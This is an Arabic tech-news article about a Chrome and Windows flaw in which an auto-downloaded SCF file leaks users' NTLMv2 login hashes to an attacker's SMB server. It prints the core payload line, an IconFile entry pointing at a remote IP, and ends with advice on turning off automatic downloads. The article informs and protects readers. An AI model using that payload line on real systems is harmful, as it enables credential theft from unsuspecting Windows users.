إحذر ! الآن يمكن سرقة بيانات دخول حاسوبك ويندوز عن بعد فقط بإستخدام متصفح كروم

فقط بتحميل هذا الملف عبر متصفح جوجل كروم و من دون حتى الضغط عليه ، يمكن للهكر سرقة معلومات الدخول لحواسيبكم ويندوز عن بعد بكل سهولة . إليكم كيف ؟

تمكن باحث أمني من إكتشاف ثغرة خطيرة جدا على مستوى الإعدادات الإفتراضية لآخر إصدار من متصفح جوجل كروم  و الذي يعمل على مختلف إصدارات و نسخ انظمة التشغيل ويندوز ، من بينها ويندوز 10 الذي تُروج له مايكروسوفت على أنه أحد أكثر انظمتها أمنا ، يمكن من خلالها سرقة بيانات دخول المستخدمين عن بعد و بكل سهولة.

اكتشف الباحث الأمني Bosko Stankovic من شركة DefenseCode أنه فقط بزيارة موقع ملغم بملف SCF خبيث ، يمكن للمستخدمين و دون علمهم مشاركة معلومات دخول حواسيبهم  مع هكرز عبر متصفح جوجل كروم و بروتوكول SMB دون استخدام أي آليات أو سكريبنات معقدة.

متصفح كروم + SCF + SMB = سرقة بيانات دخول المستخدمين

الملف SCF المستخدم في استغلال هذه الثغرة الجديدة ما هو إلا ملف إطلاق الأوامر : Windows Explorer Shell Command ، الذي يُستخدم في تنفيذ بعض الأوامر الخاصة بمتصفح الملفات في أنظمة ويندوز مثل : إظهار سطح المكتب ، فتح متصف الملفات ..... أو حتى تعريف و إعطاء المسارات لبعض الأيقونات الخاصة في ويندوز مثل أيقونة سطح المكتب ، سلة المهملات...

بالجمع بين استغلال ملف SCF و بروتوكول SMB  . وبإستغلال ثغرة على متصفح كروم تمكن Stankovic من التوصل الى طريقة الإختراق الجديدة التي يتم فيها خداع ويندوز و التلاعب به لإرسال معلومات الدخول الخاصة بالمستخدمين الى خوادم SMB .

فبمجرد تحميل المستخدم  للملف الملغم الى النظام و فتح مجلد التحميلات ، تبدأ عملية الإختراق و يتم تنفيذ الأكواد التي يحتويها ، و التي تكون كما الآتي : Shell] IconFile=\\170.170.170.170\icon  ، مما يعني أن طريقة الإختراق هذه لا تحتاج الى فتح او الضغط على أي ملف.

لتبدأ بعد ذلك مهمة خادم SMB الذي يعمل على ربط الإتصال بحاسوب الضحية ، و الإستيلاء على باسورد الدخول و باسورد NTLMv2 الذي يمكن فك تشفيره بسهولة من على أي حاسوب آخر.

كيف تحمي نفسك من هذه الثغرة ؟

لتفادي الوقوع ضحية طريقة الإختراق الجديدة ، نصح Stankovic المستخدمين بإيقاف تشغيل خاصية التحميل الأوتوماتيكي بجوجل كروم و ذلك يالذهاب الى صفحة الإعدادات ثم إظهار الإعدادات المتقدمة Advanced Settings و إختيار خاصية Ask where to save each file before downloading.

بإختيارك للخيار أعلاه ، ستُجبر متصفح كروم على طلب الإذن منك قبل تحميل و حفظ أي ملف ، و هذا طبعا الى حين ترقيع الثغرة من طرف جوجل.

مواضيع ذات صلة :
+ الآن يمكن اختراق حسابك جوجل و الإطلاع على إيميلاتك فقط بالضغط على هذا الرابط.
+ و اخيرا تم طرح أدوات االإختراق الخطيرة المسربة الخاصة بوكالة الأمن القومي للتحميل المجاني.
+ إحذر ! ثغرة خطيرة تهدد كل اصدارات ويندوز بدون استثناء حتى التي تم تحديثها.